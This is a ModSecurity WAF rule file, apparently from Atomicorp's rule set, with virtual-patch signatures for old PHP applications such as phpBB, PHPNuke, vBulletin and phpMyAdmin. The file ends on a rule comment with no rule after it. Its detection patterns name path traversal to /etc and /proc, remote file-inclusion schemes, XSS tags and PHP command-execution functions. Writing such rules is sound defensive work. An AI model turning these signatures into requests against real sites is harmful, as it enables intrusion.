SecRule REQUEST_URI "default_theme\.php" "phase:2,chain,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,id:390652,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - FreePHPBlogSoftware phpincdir File Inclusion Vulnerability'"
SecRule ARGS:phpincdir "(?:^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./|/(?:etc|proc|sys|tmp|var|home))"
#OSSEC 404 stuff does this better
SecRule REQUEST_URI "thisdoesnotexistahaha\.php" "phase:2,id:350023,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Non-Existant File Google Recon attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 380005: phpBB Remote Code Execution Attempt
SecRule REQUEST_URI "viewtopic\.php\?" "phase:2,id:380005,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: PHP session cookie attack',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:highlight "(\'|\%[a-f0-9]{4})(\.|\/|\\|\%[a-f0-9]{4}).+?(\'|\%[a-f0-9]{4})"
# Rule 310008: squirrel mail spell-check arbitrary command attempt
SecRule REQUEST_URI "/squirrelspell/modules/check_me\.mod\.php" "phase:2,id:310008,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: squirrel mail spell-check arbitrary command attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "sqspell_app\["
# Rule 310009: squirrel mail theme arbitrary command attempt
SecRule REQUEST_URI "/left_main\.php" "phase:2,id:310009,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: squirrel mail theme arbitrary command attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "cmdd="
# Rule 310010: directory.php arbitrary command attempt
SecRule REQUEST_URI "/directory\.php\?" "phase:2,id:310010,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: directory.php arbitrary command attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "\;"
# Rule 310045: DNSTools administrator authentication bypass attempt
SecRule REQUEST_URI "/dnstools\.php" "phase:2,id:310045,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DNSTools administrator authentication bypass attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "(?:user_dnstools_administrator|user_logged_in)=true"
# Rule 310049: Blahz-DNS dostuff.php modify user attempt
SecRule REQUEST_URI "/dostuff\.php\?action=modify_user" "phase:2,id:310049,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Blahz-DNS dostuff.php modify user attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310050: PHP-Wiki cross site scripting attempt
SecRule REQUEST_URI "/modules\.php\?*name=wiki*\<*(script|about|applet|activex|chrome)*\>" "phase:2,id:310050,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP-Wiki cross site scripting attemptt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310053: shoutbox.php directory traversal attempt
SecRule REQUEST_URI "/shoutbox\.php" "phase:2,id:310053,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: shoutbox.php directory traversal attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "\.\./"
# Rule 310057: autohtml.php directory traversal attempt
SecRule REQUEST_URI "/autohtml\.php" "phase:2,id:310057,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: autohtml.php directory traversal attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "\.\./\.\./"
# Rule 310061:rolis guestbook remote file include attempt
SecRule REQUEST_URI "/insert\.inc\.php*path=" "phase:2,id:310061,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: guestbook remote file include attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310064: DCP-Portal remote file include attempt
SecRule REQUEST_URI "/library/lib\.php" "phase:2,id:310064,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: DCP-Portal remote file include attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "root="
# Rule 310067: Invision Board emailer.php file include
SecRule REQUEST_URI "/ad_member\.php" "id:310067,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Invision Board emailer.php file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "emailer\.php"
# Rule 310068: WebChat db_mysql.php file include
SecRule REQUEST_URI "/defines\.php" "id:310068,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WebChat db_mysql.php file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "db_mysql\.php"
# Rule 310069: WebChat english.php file include
SecRule REQUEST_URI "/defines\.php" "id:310069,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WebChat english.php file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "english\.php"
# Rule 310070: Typo3 translations.php file include
SecRule REQUEST_URI "/translations\.php" "id:310070,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Typo3 translations.php file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "only=\x2e"
# Rule 310072: YaBB SE packages.php file include
SecRule REQUEST_URI "/packages\.php" "id:310072,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: YaBB SE packages.php file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "packer\.php"
# Rule 310073: newsPHP Language file include attempt
SecRule REQUEST_URI "/nphpd\.php" "id:310073,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: newsPHP Language file include attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "langFile"
# Rule 310075:Invision Board ipchat.php file include
SecRule REQUEST_URI "/ipchat\.php*root_path*conf_global\.php" "id:310075,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Invision Board ipchat.php file include',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310077: PhpGedView PGV functions.php base directory manipulation
# attempt
SecRule REQUEST_URI "(?:functions|_conf|config_gedcom|authentication_index)\.php" "id:310077,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhpGedView PGV functions.php base directory manipulation attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "pgv_base_directory"
# Rule 310078: TUTOS path disclosure attempt
SecRule REQUEST_URI "/note_overview\.php" "id:310078,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TUTOS path disclosure attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "id="
# Rule 310083:Calendar XSS
SecRule REQUEST_URI "/(?:calendar|setup).php" "chain,id:310083,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Calendar XSS',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:phpc_root_path "(?:^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|(?:<|script|about|applet|activex|chrome))"
# Rule 310084:phpMyAdmin Export.PHP File Disclosure Vulnerability
SecRule REQUEST_URI "export\.php" "id:310084,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpMyAdmin Export.PHP File Disclosure Vulnerability',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:what "\.\."
# Rule 310086:More PHPBB worms
SecRule REQUEST_URI "/viewtopic\.php\?" "id:310086,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPBB worm',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS "(?:chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(?:(?:[0-9a-fa-fx]{1,3})\)"
# Rule 310211: Phorum /support/common.php access
SecRule REQUEST_URI "/support/common\.php" "id:310211,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Phorum common.php direct access attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310212: rolis guestbook remote file include attempt
SecRule REQUEST_URI "/insert\.inc\.php" "id:310212,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Rolis guestbook insert.inc.php remote file inclusion attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "path="
# Rule 310217: Invision Board ipchat.php file include
SecRule REQUEST_URI "/ipchat\.php" "id:310217,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: : Invision Board ipchat.php file inclusion attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "conf_global\.php"
# Rule 310219: YaBB SE packages.php file include
SecRule REQUEST_URI "/packages\.php" "id:310219,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: : YaBB SE packages.php file inclusion attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "packer\.php"
# Rule 310224: WAnewsletter newsletter.php file inclusion attempt
SecRule REQUEST_URI "newsletter\.php" "id:310224,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: : WAnewsletter newsletter.php file inclusion attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "start\.php"
# Rule 310225: Opt-X header.php remote file include attempt
SecRule REQUEST_URI "/header\.php" "id:310225,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: : Opt-X header.php remote file inclusion attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "systempath="
# Rule 310228: Dforum executable code injection attempt
SecRule REQUEST_URI "/dforum/nav\.php" "chain,id:310228,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Dforum nav.php3 executable code injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:page "<[[:space:]]*(?:script|about|applet|activex|chrome)"
# Rule 310229: phpMyAdmin path vln
SecRule REQUEST_URI "/css/phpmyadmin\.css\.php" "chain,id:310229,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpMyAdmin phpmyadmin.css.php file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:globals[cfg][themepath] "(?:/|\.\./)"
# Rule 310231: PHPBB full path disclosure
SecRule REQUEST_URI "(?:forums?|phpbb)/db/oracle\.php" "id:310231,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPBB oracle.php full path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310239: phpbb
SecRule REQUEST_URI "admin/admin_styles\.php\?mode=addnew\&install_to=\.\./\.\./" "id:310239,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB admin_styles.php directory traversal attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310241: phpAdsNew path disclosure
SecRule REQUEST_URI "/libraries/lib-xmlrpcs.inc\.php" "id:310241,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew lib-xmlrpcs.inc.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310242: phpAdsNew path disclosure
SecRule REQUEST_URI "/maintenance/maintenance-activation\.php" "id:310242,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew maintenance-activation.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310243: phpAdsNew path disclosure
SecRule REQUEST_URI "/maintenance/maintenance-cleantables\.php" "id:310243,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew maintenance-cleantables.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310244: phpAdsNew path disclosure
SecRule REQUEST_URI "/maintenance/maintenance-autotargeting\.php" "id:310244,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew maintenance-autotargeting.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310245: phpAdsNew path disclosure
SecRule REQUEST_URI "/maintenance/maintenance-reports\.php" "id:310245,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew maintenance-reports.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310246: phpAdsNew path disclosure
SecRule REQUEST_URI "/misc/backwards\x20compatibility/phpads\.php" "id:310246,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew backwards compatibility phpads.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310247: phpAdsNew path disclosure
SecRule REQUEST_URI "/misc/backwards\x20compatibility/remotehtmlview\.php" "id:310247,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew backwards compatibility remotehtmlview.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310248: phpAdsNew path disclosure
SecRule REQUEST_URI "/misc/backwards\x20compatibility/click\.php" "id:310248,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew backwards compatibility click.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310253: citrusdb
SecRule REQUEST_URI "/citrusdb/tools/uploadcc\.php" "id:310253,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: citrusdb tools/uploadcc.php credit card data upload attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310262: phpbb XSS
SecRule REQUEST_FILENAME "/posting\.php" "chain,id:310262,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB posting.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:phpbb2mysql_t "(?:\<(?:script|javascript|about|applet|activex|chrome)|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310263: phpbb XSS
SecRule REQUEST_URI "/posting\.php" "chain,id:310263,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB posting.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "(?:\<(?:javascript|script|about|applet|activex|chrome)|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310264: phpbb XSS
SecRule REQUEST_URI|REQUEST_BODY "/privmsg\.php" "id:310264,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB privmsg.php cross-site-scripting attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI|REQUEST_BODY "\<a href=*(?:script|about|applet|activex|chrome)"
# Rule 310266: Unique stuff caught in our traps
SecRule REQUEST_URI "/mail_autocheck\.php\?pm_path=(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "id:310266,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mail_autocheck.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310269: Multiple Vulnerabilities in ProjectBB
SecRule REQUEST_URI "/divers\.php\?action=liste\&liste=\&desc=\&pages=(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "id:310269,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ProjectBB divers.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310270: Multiple Vulnerabilities in ProjectBB
SecRule REQUEST_URI "/divers\.php\?action=liste\&liste=(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "id:310270,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ProjectBB divers.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310271: Multiple Vulnerabilities in ProjectBB
SecRule REQUEST_FILENAME "/zip/divers\.php" "chain,id:310271,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ProjectBB Zip/divers.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
Secrule ARGS:desc "'"
# Rule 310272: WebChat english.php or db_mysql.php file include
SecRule REQUEST_FILENAME "/defines\.php" "chain,id:310272,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WebChat defines.php local file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "(?:db_mysql\.php|english\.php)"
# Rule 310273: Cross-Site Scripting Vulnerability in D-Forum
SecRule REQUEST_URI "/nav\.php3\?page=(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "id:310273,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: D-Forum nav.php3 cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310275: Multiple Vulnerabilities in auraCMS
SecRule REQUEST_URI "/hits\.php\?hits=(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "id:310275,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auraCMA hits.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310276: Multiple Vulnerabilities in auraCMS
SecRule REQUEST_URI "/counter\.php\?theCount=(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "id:310276,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auraCMA counter.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310277: vBulletin Remote Command Execution Attempt
SecRule REQUEST_URI "/forumdisplay\.php?[^\r\n]*comma=[^\r\n\x26]*system\x28" "id:310277,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: vBulletin forumdisplay.php local command execution attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310278: vBulletin Remote Command Execution Attempt
SecRule REQUEST_URI "/forumdisplay\.php\?" "id:310278,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: vBulletin forumdisplay.php local command execution attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI|REQUEST_BODY "\.system\(.+\)\."
# Rule 310279: vBulletin Remote Command Execution Attempt
SecRule REQUEST_URI "/forumdisplay\.php\?*comma=" "id:310279,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: vBulletin forumdisplay.php local command execution attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310280: PHPNuke general XSS attempt
#/modules.php?name=News&file=article&sid=1&optionbox=
SecRule REQUEST_URI "/modules\.php\?*name=*\<*(?:script|about|applet|activex|chrome)*\>" "id:310280,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310281: PHPNuke general XSS attempt
SecRule REQUEST_URI "/modules\.php\?op=modload&name=News&file=article&sid=*\<*(?:script|about|applet|activex|chrome)*\>" "id:310281,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310282: PHPNuke SQL injection attempt
SecRule REQUEST_URI "/modules\.php\?*name=search*instory=" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310282,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php SQL injection attempt'"
# Rule 310283: PHPNuke SQL injection attempt
SecRule REQUEST_FILENAME "/modules.php " "chain,t:none,t:urlDecodeUni,t:lowercase,id:310283,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php SQL injection attempt'"
SecRule ARGS:name "(?:search|web_links)" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
SecRule ARGS "'" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
# Rule 310284: EasyDynamicPages exploit
SecRule REQUEST_URI "!(^/livehelp/admin_users_refresh\.php)" "chain,id:310284,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: EasyDynamicPages edp_relative_path exploitation attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "edp_relative_path="
# Rule 310286: phpnuke sql insertion
#SecRule REQUEST_URI "/modules\.php*name=forums.*file=viewtopic*/forum=.*\'/" # "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310286,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php SQL injection attempt'"
# Rule 310287: WAnewsletter newsletter.php file include attempt
SecRule REQUEST_URI "newsletter\.php*waroot*start\.php" "id:310287,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WAnewsletter newsletter.php local file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310288: Typo3 translations.php file include
SecRule REQUEST_URI "/translations\.php*only" "id:310288,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Typo3 translations.php local file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310307: RUNCMS,Exoops,CIAMOS highlight file access hole
SecRule REQUEST_URI "/class/debug/highlight\.php\?file=(?:/|\.\./)" "id:310307,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RUNCMS.Exoops.CIAMOS highlight.php file access attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310308: TRG/CzarNews News Script Include File Hole Lets Remote users
# Execute Arbitrary Commands
SecRule REQUEST_URI "/install/(?:article|authorall|comment|display|displayall.)\.php\?dir=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310308,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TRG/CzarNews /install/* local command execution attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310309: zpanel XSS
#SecRule REQUEST_FILENAME "/zpanel.php" # "chain,id:310309,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: zPanel zpanel.php cross-site-scripting or SQLi attempt'"
#SecRule ARGS:page "(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|')"
# Rule 310311: Phorum http Response Splitting Vulnerability
#SecRule REQUEST_URI "/search\.php\?forum_id=.*\&search=.*\&body=.*Content-Length\:.*HTTP/1\.0.*Content-Type\:.*Content-Length\:" # "id:310311,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Phorum search.php http response splitting attempt'"
# Rule 310313: PhotoPost Pro
SecRule REQUEST_FILENAME "/showgallery\.php" "chain,id:310313,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhotoPost showgallery.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:page "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|<)"
# Rule 310314: PhotoPost Pro
SecRule REQUEST_URI "/showgallery\.php\?si=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310314,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhotoPost showgallery.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310315: PhotoPost Pro
#SecRule REQUEST_URI "/showgallery\.php\?ppuser=[0-9].*\&cat=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" # "id:310315,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhotoPost showgallery.php cross-site-scripting attempt'"
# Rule 310316: PhotoPost Pro
#SecRule REQUEST_URI "/showgallery\.php\?(?:cat|ppuser)=[0-9].*\'" # "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310316,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhotoPost showgallery.php SQL injection attempt'"
# Rule 310320: Kayako eSupport Cross Site Scripting Vulnerability
#SecRule REQUEST_URI "/esupport/index.php\?_a=knowledgebase\&_j=questiondetails\&_i=[0-9].*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310320,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Kayako eSupport index.php cross-site-scripting attempt'"
# Rule 310321: Kayako eSupport Cross Site Scripting Vulnerability
#SecRule REQUEST_URI "/esupport/index.php\?_a=knowledgebase\&_j=questionprint\&_i=[0-9].*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310321,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Kayako eSupport index.php cross-site-scripting attempt'"
# Rule 310322: Kayako eSupport Remote Cross Site Scripting Vulnerability
#SecRule REQUEST_URI "/esupport/index.php\?_a=troubleshooter\&_c=[0-9].*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310322,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Kayako eSupport index.php cross-site-scripting attempt'"
# Rule 310323: Kayako eSupport Remote Cross Site Scripting Vulnerability
